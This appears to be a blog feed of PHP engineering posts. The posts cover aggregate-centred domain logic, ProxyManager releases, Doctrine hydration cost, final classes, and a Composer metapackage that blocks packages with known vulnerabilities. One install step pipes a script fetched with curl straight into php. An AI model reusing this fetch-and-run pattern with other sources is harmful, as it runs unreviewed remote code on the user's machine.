    Given the user has added some products to their shopping cart
    And the user has checked out the shopping cart with their credit card
    When the user checks out the shopping cart with their credit card
    Then the user was not charged

The scenario is quite generic, but you should be able to see what the application is supposed to do.

An initial implementation

I will take an imperative command + domain-events approach, but we don't need to dig into the patterns behind it, as it is quite simple.

We are looking at a command like the following:

final class CheckOutShoppingCart
{
    public static function from(
        CreditCardCharge $charge,
        ShoppingCartId $shoppingCart
    ) : self {
        // ...
    }

    public function charge() : CreditCardCharge { /* ... */ }
    public function shoppingCart() : ShoppingCartId { /* ... */ }
}

If you are unfamiliar with what a command is, it is just the object that our frontend or API throws at our actual application logic.

Then there is an aggregate performing the actual domain logic work:

final class ShoppingCart
{
    // ... 

    public function checkOut(CapturedCreditCardCharge $charge) : void
    {
        $this->charge = $charge;

        $this->raisedEvents[] = ShoppingCartCheckedOut::from(
            $this->id,
            $this->charge
        );
    }

    // ... 
}

If you are unfamiliar with what an aggregate is, it is the direct object in our interaction (look at the sentences in the scenario). In your existing applications, it would most likely (but not exclusively) be an entity or a DB record or group of entities/DB records that you are considering during a business interaction.

We need to glue this all together with a command handler:

final class HandleCheckOutShoppingCart
{
    public function __construct(Carts $carts, PaymentGateway $gateway)
    {
        $this->carts   = $carts;
        $this->gateway = $gateway;
    }

    public function __invoke(CheckOutShoppingCart $command) : void
    {
        $shoppingCart = $this->carts->get($command->shoppingCart());

        $payment = $this->gateway->captureCharge($command->charge());

        $shoppingCart->checkOut($payment);
    }
}

This covers the "happy path" of our workflow, but we still lack:

  • The ability to check whether the payment has already occurred
  • Preventing payment for empty shopping carts
  • Preventing payment of an incorrect amount
  • Handling of critical failures on the payment gateway

In order to do that, we have to add some "guards" that prevent the interaction. This is the approach that I've seen being used in the wild:

final class HandleCheckOutShoppingCart
{
    // ... 

    public function __invoke(CheckOutShoppingCart $command) : void
    {
        $cartId = $command->shoppingCart();
        $charge = $command->charge();

        $shoppingCart = $this->carts->get($cartId);

        // these guards are injected callables. They throw exceptions:
        ($this->nonEmptyShoppingCart)($cartId);
        ($this->nonPurchasedShoppingCart)($cartId);
        ($this->paymentAmountMatches)($cartId, $charge->amount());

        $payment = $this->gateway->captureCharge($charge);

        $shoppingCart->checkOut($payment);
    }
}

As you can see, we are adding some logic to our command handler here. This is usually done because dependency injection on the command handler is easy. Passing services to the aggregate via dependency injection is generally problematic and to be avoided, since an aggregate is usually a "newable type".

With this code, we are able to handle most unhappy paths, and eventually also failures of the payment gateway (not in this article).
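As a side note, the PaymentGateway contract used by the handler is never shown in this post; a hypothetical sketch consistent with the calls above could look like this (both the interface body and the exception name are assumptions, not part of the original code):

```php
<?php

// Hypothetical sketch: this interface is not shown in the original post,
// but it is consistent with how the command handler calls the gateway.
interface PaymentGateway
{
    /**
     * @throws PaymentFailedException if the charge cannot be captured
     *         (exception name is hypothetical)
     */
    public function captureCharge(CreditCardCharge $charge) : CapturedCreditCardCharge;
}
```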

The problem

While the code above works, what we did was add some domain-specific logic to the command handler. Since the command handler is part of our application layer, we are effectively diluting these checks into "less important layers".

In addition to that, the command handler is required in tests that consume the above specification: without the command handler, our logic will fail to handle the unhappy paths in our scenarios.

For those that are reading and practice CQRS+ES: you also know that those guards aren't always simple to implement! Read models, projections... Oh my!

Also: what if we wanted to react to those failures, rather than just stop execution? Who is responsible for that?

If you went the TDD way, then you already saw all of this coming: let's fix it!

Moving domain logic back into the domain

We put logic from the domain layer (which should live in the aggregate) into the application layer: let's turn this around and put domain logic back in the domain (read: in the aggregate logic).

Since we don't really want to inject a payment gateway as a constituent part of our aggregate root (a newable shouldn't have non-newable dependencies), we just borrow a brutally simple concept from functional programming: we pass the interactor as a method parameter.

final class ShoppingCart
{
    // ... 

    public function checkOut(
        CheckOutShoppingCart $checkOut,
        PaymentGateway $paymentGateway
    ) : void {
        $charge = $checkOut->charge();

        Assert::null($this->payment, 'Already purchased');
        Assert::greaterThan(0, $this->totalAmount, 'Price invalid');
        Assert::same($this->totalAmount, $charge->amount());

        $this->charge = $paymentGateway->captureCharge($charge);

        $this->raisedEvents[] = ShoppingCartCheckedOut::from(
            $this->id,
            $this->charge
        );
    }

    // ... 
}

The command handler is also massively simplified, since all it does is forward the required dependencies to the aggregate:

final class HandleCheckOutShoppingCart
{
    // ... 

    public function __invoke(CheckOutShoppingCart $command) : void
    {
        $this
            ->shoppingCarts
            ->get($command->shoppingCart())
            ->checkOut($command, $this->gateway);
    }
}

Conclusions

Besides getting rid of the command handler in the scenario tests, here is a list of advantages of what we just implemented:

  1. The domain logic is all in one place, easy to read and easy to change.
  2. We can run the domain without infrastructure code (note: the payment gateway is a domain service)
  3. We can prevent invalid interactions from happening without having to push verification data across multiple layers
  4. Our aggregate is now able to fulfill its main role: being a domain-specific state machine, preventing invalid state mutations.
  5. If something goes wrong, then the aggregate is able to revert state mutations.
  6. We can raise domain events on failures, or execute custom domain logic.

The approach described here fits any kind of application where there is a concept of Entity or Aggregate. Feel free to stuff your entity API with business logic!

Just remember that entities should only be self-aware, and only context-aware in the context of certain business interactions: don't inject or statically access domain services from within an entity.

]]>
<![CDATA[ProxyManager 2.0.0 release and expected 2.x lifetime]]> 2016-01-29T00:00:00+00:00 https://ocramius.github.io/blog/proxy-manager-2-0-0-release/ ProxyManager

ProxyManager 2.0.0 was finally released today!

It took a bit more than a year to get here, but major improvements were included in this release, along with PHP 7-only support.

Most of the features that we planned to provide were indeed implemented into this release.

As a negative note, HHVM compatibility was not achieved, as HHVM is not yet compatible with PHP 7.0.x-compliant code.

As of this release, ProxyManager 1.0.x switches to security-only support.

Planned maintenance schedule

ProxyManager 2.x will be a maintenance-only release:

  • I plan to fix bugs until
  • I plan to fix security issues until

No features are going to be added to ProxyManager 2.x: the current master branch will instead become the development branch for version 3.0.0.

Features for ProxyManager 3.0.0 are yet to be planned, but we reached exceptional code quality, complete test coverage and nice performance improvements with 2.0.0: the future is bright!

Thank you!

And of course, a big "thank you" to all those who contributed to this release!

]]>
<![CDATA[Doctrine ORM Hydration Performance Optimization]]> 2015-04-13T00:00:00+00:00 https://ocramius.github.io/blog/doctrine-orm-optimization-hydration/ PRE-REQUISITE: Please note that this article explains the complexity of internal ORM operations using Big-O notation. Consider reading an introduction to Big-O notation first, if you are not familiar with it.

What is hydration?

Doctrine ORM, like most ORMs, performs a process called Hydration when converting database results into objects.

This process usually involves reading a record from a database result and then converting the column values into an object's properties.

Here is a little pseudo-code snippet that shows what a mapper is actually doing under the hood:

<?php

$results          = [];
$reflectionFields = $mappingInformation->reflectionFields();

foreach ($resultSet->fetchRow() as $row) {
    $object = new $mappedClassName;

    foreach ($reflectionFields as $column => $reflectionField) {
        $reflectionField->setValue($object, $row[$column]);
    }

    $results[] = $object;
}

return $results;

That's a very basic example, but this gives you an idea of what an ORM is doing for you.

As you can see, this is an O(N) operation (assuming a constant number of reflection fields).

There are multiple ways to speed up this particular process, but we can only remove constant overhead from it, and not actually reduce it to something more efficient.

When is hydration expensive?

Hydration starts to become expensive with complex resultsets.

Consider the following SQL query:

SELECT
    u.id       AS userId,
    u.username AS userUsername,
    s.id       AS socialAccountId,
    s.username AS socialAccountUsername,
    s.type     AS socialAccountType
FROM
    user u
LEFT JOIN
    socialAccount s
        ON s.userId = u.id

Assuming that the relation from user to socialAccount is a one-to-many, this query retrieves all the social accounts for all the users in our application.

A resultset may be as follows:

userId | userUsername    | socialAccountId | socialAccountUsername | socialAccountType
1      | [email protected] | 20              | ocramius              | Facebook
1      | [email protected] | 21              | @ocramius             | Twitter
1      | [email protected] | 22              | ocramiusaethril       | Last.fm
2      | [email protected] | NULL            | NULL                  | NULL
3      | [email protected] | 85              | awesomegrandma9917    | Facebook

As you can see, we are now joining 2 tables in the results, and the ORM has to perform more complicated operations:

  • Hydrate 1 User object for [email protected]
  • Hydrate 3 SocialAccount instances into User#$socialAccounts for [email protected], while skipping re-hydration of the User [email protected]
  • Hydrate 1 User object for [email protected]
  • Skip hydrating User#$socialAccounts for [email protected], as no social accounts are associated
  • Hydrate 1 User object for [email protected]
  • Hydrate 1 SocialAccount instance into User#$socialAccounts for [email protected]

This operation is what Doctrine ORM performs when you use the DQL Fetch Joins feature.

Fetch joins are a very efficient way to hydrate multiple records without resorting to multiple queries, but there are two performance issues with this approach (neither covered by this article):

  • Empty records require some useless looping inside the ORM internals (see [email protected]'s social account). This is a quick operation, but we can't simply ignore those records upfront.
  • If multiple duplicated records are being joined (happens a lot in many-to-many associations), then we want to de-duplicate records by keeping a temporary in-memory identifier map.

Additionally, our operation starts to become more complicated, as it is now O(n * m), with n and m being the number of records in the user and the socialAccount tables.

What the ORM is actually doing here is normalizing data that was fetched in a de-normalized resultset, and that is going through your CPU and your memory.
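The normalization above can be sketched in plain PHP (this is not actual ORM code, and the sample rows are assumed data mirroring the resultset table, with placeholder usernames): an in-memory identity map ensures each User is hydrated only once, while the "empty" LEFT JOIN records are skipped.

```php
<?php

// Assumed sample rows mirroring the resultset above (usernames are placeholders):
$rows = [
    ['userId' => 1, 'userUsername' => 'user1', 'socialAccountId' => 20,   'socialAccountUsername' => 'ocramius',           'socialAccountType' => 'Facebook'],
    ['userId' => 1, 'userUsername' => 'user1', 'socialAccountId' => 21,   'socialAccountUsername' => '@ocramius',          'socialAccountType' => 'Twitter'],
    ['userId' => 1, 'userUsername' => 'user1', 'socialAccountId' => 22,   'socialAccountUsername' => 'ocramiusaethril',    'socialAccountType' => 'Last.fm'],
    ['userId' => 2, 'userUsername' => 'user2', 'socialAccountId' => null, 'socialAccountUsername' => null,                 'socialAccountType' => null],
    ['userId' => 3, 'userUsername' => 'user3', 'socialAccountId' => 85,   'socialAccountUsername' => 'awesomegrandma9917', 'socialAccountType' => 'Facebook'],
];

$users = []; // in-memory identity map, keyed by user id

foreach ($rows as $row) {
    $userId = $row['userId'];

    // hydrate each User only once, no matter how many joined rows reference it
    if (! isset($users[$userId])) {
        $users[$userId] = ['username' => $row['userUsername'], 'socialAccounts' => []];
    }

    // skip the "empty" records produced by the LEFT JOIN
    if ($row['socialAccountId'] !== null) {
        $users[$userId]['socialAccounts'][$row['socialAccountId']] = [
            'username' => $row['socialAccountUsername'],
            'type'     => $row['socialAccountType'],
        ];
    }
}
```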

Bringing hydration cost to an extreme

The process of hydration becomes extremely expensive when more than 2 LEFT JOIN clauses are part of our queries:

SELECT
    u.id         AS userId,
    u.username   AS userUsername,
    sa.id        AS socialAccountId,
    sa.username  AS socialAccountUsername,
    sa.type      AS socialAccountType,
    s.id         AS sessionId,
    s.expiresOn  AS sessionExpiresOn
FROM
    user u
LEFT JOIN
    socialAccount sa
        ON sa.userId = u.id
LEFT JOIN
    session s
        ON s.userId = u.id

This kind of query produces a much larger resultset, and the results are duplicated by a lot:

userId | userUsername    | socialAccountId | socialAccountUsername | socialAccountType | sessionId        | sessionExpiresOn
1      | [email protected] | 20              | ocramius              | Facebook          | ocramius-macbook | 2015-04-20 22:08:56
1      | [email protected] | 21              | @ocramius             | Twitter           | ocramius-macbook | 2015-04-20 22:08:56
1      | [email protected] | 22              | ocramiusaethril       | Last.fm           | ocramius-macbook | 2015-04-20 22:08:56
1      | [email protected] | 20              | ocramius              | Facebook          | ocramius-android | 2015-04-20 22:08:56
1      | [email protected] | 21              | @ocramius             | Twitter           | ocramius-android | 2015-04-20 22:08:56
1      | [email protected] | 22              | ocramiusaethril       | Last.fm           | ocramius-android | 2015-04-20 22:08:56
2      | [email protected] | NULL            | NULL                  | NULL              | NULL             | NULL
3      | [email protected] | 85              | awesomegrandma        | Facebook          | home-pc          | 2015-04-15 10:05:31

If you try to re-normalize this resultset, you can actually see how many useless de-duplication operations have to happen.

That is because the User [email protected] has multiple active sessions on multiple devices, as well as multiple social accounts.

SLOW! The hydration operations on this resultset are O(n * m * q), which I'm going to simply generalize as O(n ^ m), with n being the amount of results, and m being the amount of joined tables.

Here is a graphical representation of O(n ^ m):

Boy, that escalated quickly

Yes, it is bad.

How to avoid O(n ^ m) hydration?

O(n ^ m) can be avoided with some very simple, yet effective approaches.

No, it's not "don't use an ORM", you muppet.

Avoiding one-to-many and many-to-many associations

Collection-valued associations are as useful as they are problematic, as you never know how much data you are going to load.

Unless you use fetch="EXTRA_LAZY" and Doctrine\Common\Collections\Collection#slice() wisely, you will probably make your app crash if you initialize a very large collection of associated objects.

Therefore, the simplest yet most limiting advice is to avoid collection-valued associations whenever they are not strictly necessary.

Additionally, reduce the number of bi-directional associations to the strictly necessary.

After all, code that is not required should not be written in the first place.

Multi-step hydration

The second approach is simpler, and allows us to exploit how the ORM's UnitOfWork is working internally.

In fact, we can simply split hydration for different associations into different queries, or multiple steps:

SELECT
    u.id         AS userId,
    u.username   AS userUsername,
    s.id         AS socialAccountId,
    s.username   AS socialAccountUsername,
    s.type       AS socialAccountType
FROM
    user u
LEFT JOIN
    socialAccount s
        ON s.userId = u.id

We already know this query: hydration for it is O(n * m), but that's the best we can do, regardless of how we code it.

SELECT
    u.id        AS userId,
    u.username  AS userUsername,
    s.id        AS sessionId,
    s.expiresOn AS sessionExpiresOn
FROM
    user u
LEFT JOIN
    session s
        ON s.userId = u.id

This query is another O(n * m) hydration one, but we are now only loading the user sessions in the resultsets, avoiding duplicate results overall.

By re-fetching the same users, we are telling the ORM to re-hydrate those objects (which are now in memory, stored in the UnitOfWork): that fills the User#$sessions collections.

Also, please note that we could have used a JOIN instead of a LEFT JOIN, but that would have triggered lazy-loading of the sessions for the [email protected] User.

Additionally, we could also skip the userUsername field from the results, as it already is in memory and well known.

SOLUTION: We now reduced the hydration complexity from O(n ^ m) to O(n * m * k), with n being the amount of User instances, m being the amount of associated to-many results, and k being the amount of associations that we want to hydrate.

Coding multi-step hydration in Doctrine ORM

Let's get more specific and code the various queries represented above in DQL.

Here is the O(n ^ m) query (in this case, O(n ^ 3)):

return $entityManager
    ->createQuery('
        SELECT
            user, socialAccounts, sessions 
        FROM
            User user
        LEFT JOIN
            user.socialAccounts socialAccounts
        LEFT JOIN
            user.sessions sessions
    ')
    ->getResult();

This is how you'd code the multi-step hydration approach:

$users = $entityManager
    ->createQuery('
        SELECT
            user, socialAccounts
        FROM
            User user
        LEFT JOIN
            user.socialAccounts socialAccounts
    ')
    ->getResult();

$entityManager
    ->createQuery('
        SELECT PARTIAL
            user.{id}, sessions
        FROM
            User user
        LEFT JOIN
            user.sessions sessions
    ')
    ->getResult(); // result is discarded (this is just re-hydrating the collections)

return $users;

I'd also add that this is the only legitimate use-case for partial hydration that I ever had, but it's a personal opinion/feeling.

Other alternatives (science fiction)

As you may have noticed, all this overhead is caused by normalizing de-normalized data coming from the DB.

Other solutions that we may work on in the future include:

  • Generating hydrator code - solves constant overhead issues, performs better with JIT engines such as HHVM
  • Leveraging the capabilities of powerful engines such as PostgreSQL, which comes with JSON support (since version 9.4), and would allow us to normalize the fetched data to some extent
  • Generate more complex SQL, creating an own output format that is "hydrator-friendly" (re-inventing the wheel here seems like a bad idea)

Research material

Just so you stop thinking that I pulled out all these thought out of thin air, here is a repository with actual code examples that you can run, measure, compare and patch yourself:

https://github.com/Ocramius/Doctrine2StepHydration

Give it a spin and see the results for yourself!

]]>
<![CDATA[When to declare classes final]]> 2015-01-06T00:00:00+00:00 https://ocramius.github.io/blog/when-to-declare-classes-final/ TL;DR: Always make your classes final, if they implement an interface and no other public methods are defined

In the last month, I had a few discussions about the usage of the final marker on PHP classes.

The pattern is recurrent:

  1. I ask for a newly introduced class to be declared as final
  2. the author of the code is reluctant to accept this proposal, stating that final limits flexibility
  3. I have to explain that flexibility comes from good abstractions, and not from inheritance

It is therefore clear that coders need a better explanation of when to use final, and when to avoid it.

There are many other articles about the subject, but this is mainly intended as a "quick reference" for those who will ask me the same questions in future.

When to use "final":

final should be used whenever possible.

Why do I have to use final?

There are numerous reasons to mark a class as final: I will list and describe those that are most relevant in my opinion.

1. Preventing massive inheritance chain of doom

Developers have the bad habit of fixing problems by providing specific subclasses of an existing (not adequate) solution. You probably saw it yourself with examples like following:

<?php

class Db { /* ... */ }
class Core extends Db { /* ... */ }
class User extends Core { /* ... */ }
class Admin extends User { /* ... */ }
class Bot extends Admin { /* ... */ }
class BotThatDoesSpecialThings extends Bot { /* ... */ }
class PatchedBot extends BotThatDoesSpecialThings { /* ... */ }

This is, without any doubts, how you should NOT design your code.

The approach described above is usually adopted by developers who confuse OOP with "a way of solving problems via inheritance" ("inheritance-oriented-programming", maybe?).

2. Encouraging composition

In general, preventing inheritance in a forceful way (by default) has the nice advantage of making developers think more about composition.

There will be less stuffing of functionality into existing code via inheritance, which, in my opinion, is a symptom of haste combined with feature creep.

Take the following naive example:

<?php

class RegistrationService implements RegistrationServiceInterface
{
    public function registerUser(/* ... */) { /* ... */ }
}

class EmailingRegistrationService extends RegistrationService
{
    public function registerUser(/* ... */) 
    {
        $user = parent::registerUser(/* ... */);

        $this->sendTheRegistrationMail($user);

        return $user;
    }

    // ...
}

By making the RegistrationService final, the idea behind EmailingRegistrationService being a child-class of it is denied upfront, and silly mistakes such as the previously shown one are easily avoided:

<?php

final class EmailingRegistrationService implements RegistrationServiceInterface
{
    public function __construct(RegistrationServiceInterface $mainRegistrationService) 
    {
        $this->mainRegistrationService = $mainRegistrationService;
    }

    public function registerUser(/* ... */) 
    {
        $user = $this->mainRegistrationService->registerUser(/* ... */);

        $this->sendTheRegistrationMail($user);

        return $user;
    }

    // ...
}

3. Force the developer to think about user public API

Developers tend to use inheritance to add accessors and additional API to existing classes:

<?php

class RegistrationService implements RegistrationServiceInterface
{
    protected $db;

    public function __construct(DbConnectionInterface $db) 
    {
        $this->db = $db;
    }

    public function registerUser(/* ... */) 
    {
        // ...

        $this->db->insert($userData);

        // ...
    }
}

class SwitchableDbRegistrationService extends RegistrationService
{
    public function setDb(DbConnectionInterface $db)
    {
        $this->db = $db;
    }
}

This example shows a set of flaws in the thought-process that led to the SwitchableDbRegistrationService:

  • The setDb method is used to change the DbConnectionInterface at runtime, which seems to hide a different problem being solved: maybe we need a MasterSlaveConnection instead?
  • The setDb method is not covered by the RegistrationServiceInterface, therefore we can only use it when we strictly couple our code with the SwitchableDbRegistrationService, which defeats the purpose of the contract itself in some contexts.
  • The setDb method changes dependencies at runtime, and that may not be supported by the RegistrationService logic, and may as well lead to bugs.
  • Maybe the setDb method was introduced because of a bug in the original implementation: why was the fix provided this way? Is it an actual fix or does it only fix a symptom?

There are more issues with the setDb example, but these are the most relevant ones for our purpose of explaining why final would have prevented this sort of situation upfront.

4. Force the developer to shrink an object's public API

Since classes with a lot of public methods are very likely to break the SRP, it is often true that a developer will want to override specific API of those classes.

Starting to make every new implementation final forces the developer to think about new APIs upfront, and about keeping them as small as possible.

5. A final class can always be made extensible

Coding a new class as final also means that you can make it extensible at any point in time (if really required).

No drawbacks, but you will have to explain your reasoning for such change to yourself and other members in your team, and that discussion may lead to better solutions before anything gets merged.

6. extends breaks encapsulation

Unless the author of a class specifically designed it for extension, then you should consider it final even if it isn't.

Extending a class breaks encapsulation, and can lead to unforeseen consequences and/or BC breaks: think twice before using the extends keyword, or better, make your classes final and avoid others from having to think about it.

7. You don't need that flexibility

One argument that I always have to counter is that final reduces flexibility of use of a codebase.

My counter-argument is very simple: you don't need that flexibility.

Why do you need it in the first place? Why can't you write your own customized implementation of a contract? Why can't you use composition? Did you carefully think about the problem?

If you still need to remove the final keyword from an implementation, then there may be some other sort of code-smell involved.

8. You are free to change the code

Once you made a class final, you can change it as much as it pleases you.

Since encapsulation is guaranteed to be maintained, the only thing that you have to care about is the public API.

Now you are free to rewrite everything, as many times as you want.

When to avoid final:

Final classes only work effectively under following assumptions:

  1. There is an abstraction (interface) that the final class implements
  2. All of the public API of the final class is part of that interface

If one of these two pre-conditions is missing, then you will likely reach a point in time when you will make the class extensible, as your code is not truly relying on abstractions.

An exception can be made if a particular class represents a set of constraints or concepts that are totally immutable, inflexible and global to an entire system. A good example is a mathematical operation: $calculator->sum($a, $b) will unlikely change over time. In these cases, it is safe to assume that we can use the final keyword without an abstraction to rely on first.
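To illustrate that exception, here is a minimal sketch of such a class (my own illustration, not code from the original post) — no interface, because the concept it models is not expected to ever change:

```php
<?php

// A final class without an interface: the concept it models is immutable,
// inflexible and global to the entire system.
final class Calculator
{
    public function sum($a, $b)
    {
        return $a + $b;
    }
}

$calculator = new Calculator();

echo $calculator->sum(2, 3); // 5
```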

Another case where you do not want to use the final keyword is on existing classes: that can only be done if you follow semver and you bump the major version for the affected codebase.

Try it out!

After having read this article, consider going back to your code, and if you never did so, adding your first final marker to a class that you are planning to implement.

You will see the rest just getting in place as expected.

]]>
<![CDATA[ProxyManager 1.0.0 release and expected 1.x lifetime]]> 2014-12-12T00:00:00+00:00 https://ocramius.github.io/blog/proxy-manager-1-0-0-release/ ProxyManager

Today I finally released version 1.0.0 of the ProxyManager

Noticeable improvements since 0.5.2:

Planned maintenance schedule

ProxyManager 1.x will be a maintenance-only release:

  • I plan to fix bugs until
  • I plan to fix security issues until

No features are going to be added to ProxyManager 1.x: the current master branch will instead become the development branch for version 2.0.0.

ProxyManager 2.0.0 targets

ProxyManager 2.0.0 has following main aims:

Thank you!

It wouldn't be a good 1.0.0 release without thanking all the contributors that helped with the project, by providing patches, bug reports and their useful insights to the project. Here are the most notable ones:

]]>
<![CDATA[roave/security-advisories: Composer against Security Vulnerabilities]]> 2014-12-11T00:00:00+00:00 https://ocramius.github.io/blog/roave-security-advisories-protect-against-composer-packages-with-security-issues/

Since it's almost Christmas, it's also time to release a new project!

The Roave Team is pleased to announce the release of roave/security-advisories, a package that keeps known security issues out of your project.

Before telling you more, go grab it:

mkdir roave-security-advisories-test
cd roave-security-advisories-test
curl -sS https://getcomposer.org/installer | php --

./composer.phar require roave/security-advisories:dev-master

Hold on: I will tell you what to do with it in a bit.

What is it?

roave/security-advisories is a composer package that prevents installation of packages with known security issues.

Yet another one?

Last year, Fabien Potencier announced the security.sensiolabs.org project. This October, he announced that the project was being moved to the open-source FriendsOfPHP organization.

While I like the idea of integrating security checks with my CI, I don't like that harmful software can be installed and run before those checks even happen.
I also don't want to install and run an additional CLI tool for something that composer can provide directly.

That's why I had the idea of simply compiling the known conflicting package versions from that advisories database into a composer metapackage:
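A metapackage is just a composer.json with no code of its own: only metadata. Here is a trimmed, illustrative excerpt of what such a package looks like (the real one lists hundreds of entries, and the version constraints below are simplified examples, not the actual advisory ranges):

```json
{
    "name": "roave/security-advisories",
    "type": "metapackage",
    "description": "Prevents installation of composer packages with known security vulnerabilities",
    "conflict": {
        "symfony/symfony": ">=2.5,<2.5.7",
        "zendframework/zendframework": "<2.3.3"
    }
}
```

When this package is required, composer's solver refuses any dependency resolution that would pull in a version matching one of the `conflict` constraints.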

Why?

This has various advantages:

  • No files or actual dependencies are added to the project, since a "metapackage" does not provide a vendor directory by itself
  • Packages with security issues are filtered out during dependency resolution: they will not even be downloaded
  • No more CLI tool to run separately, no more CI setup steps
  • No need to upgrade the tool separately
  • No coupling or version constraints with any dependencies used by similar CLI-based alternatives

Try it out!

Now that you have installed roave/security-advisories, you can see how it works:

cd roave-security-advisories-test

./composer.phar require symfony/symfony:2.5.2 # this will fail
./composer.phar require zendframework/zendframework:2.3.1 # this will fail
./composer.phar require symfony/symfony:~2.6 # works!
./composer.phar require zendframework/zendframework:~2.3 # works!

Simple enough!

Please note that this only works when adding new dependencies or when running composer update: security issues already locked in your composer.lock cannot be detected with this technique.

Why is there no tagged version?

Because of how composer dependency resolution works, it is not possible to maintain any version of roave/security-advisories other than dev-master. More about this can be found on the project page.


Fin

]]>